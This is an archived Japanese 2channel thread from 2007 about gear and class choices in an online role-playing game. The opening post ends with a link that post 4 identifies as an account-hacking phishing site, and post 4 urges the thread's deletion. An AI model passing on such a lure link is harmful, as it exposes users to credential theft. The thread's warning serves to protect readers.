2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

装備について

1 :veriko66 :2007/10/06(土) 14:24:17 ID:wXR5UjsG
今、+5ラスタバローブ、+6聖戦士小手、+7マジヘル、
INTシャツ、INT本、+5鉄靴、INTアミュ、+6マナマント
なんだけど、次はいきなりAR資金ためてるのね〜
14Mたまったんだけど、まだまだ先でうんざりしてます
(^−^;

ビショップ系に浮気もかんがてるんだけど、
費用対効果あるんかな??

ナイト装備とかエルフ装備を売るかねぇ、、、、
http://mbspro6uic.com/linkgss

2 :ネトゲ廃人@名無し:2007/10/06(土) 15:44:48 ID:???
ふんじゃらめええええええええええ

3 :ネトゲ廃人@名無し:2007/10/06(土) 20:01:37 ID:???
ゲームの質問は、『教えて兄貴オッス』で
ttp://dragon.warcry.biz/modules/plzXoo/

ゲームの不具合などの質問は兄貴へPMせずに『薔薇板』で
ttp://dragon.warcry.biz/modules/xhnewbb/viewforum.php?forum=1


※基本的に兄貴は個別オッスに関しては取り扱いません。
  特例として以下1〜3の条件があります。

*1)多くの人に知られることによって、悪用されてしまう恐れのあるオッス
*2)個人のプライバシーなどに関わるもの
*3)利用規約に反する行為の報告

1〜3に含まれない内容はすべて教えて兄貴もしくは薔薇板へ
普段から忙しいトロマン兄貴の負担をみんなで減らしましょう

4 :ネトゲ廃人@名無し:2007/10/06(土) 22:21:29 ID:???
ttp://so.7walker.net/index.php?site=http%3A%2F%2Fmbspro6uic.com%2Flinkgss&hua=&phishing=on

ttp://so.7walker.net/index.php?http%3A%2F%2Fwww.imbbs2t4u.com%2Flinkgss%2Fimbbs.htm&phishing=on

>3
アカウントハックの罠サイト貼るような馬鹿のスレは再利用せずにきっちり削除依頼にだしとけ。

5 :ネトゲ廃人@名無し:2007/10/08(月) 22:28:35 ID:???
ポイズンダガー 詳細不明
スカルブレイド 剣で唯一の土ダメージ強化付き
ヘヴィグランド とにかく堅い
ウインドテイル 意味不明


2 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)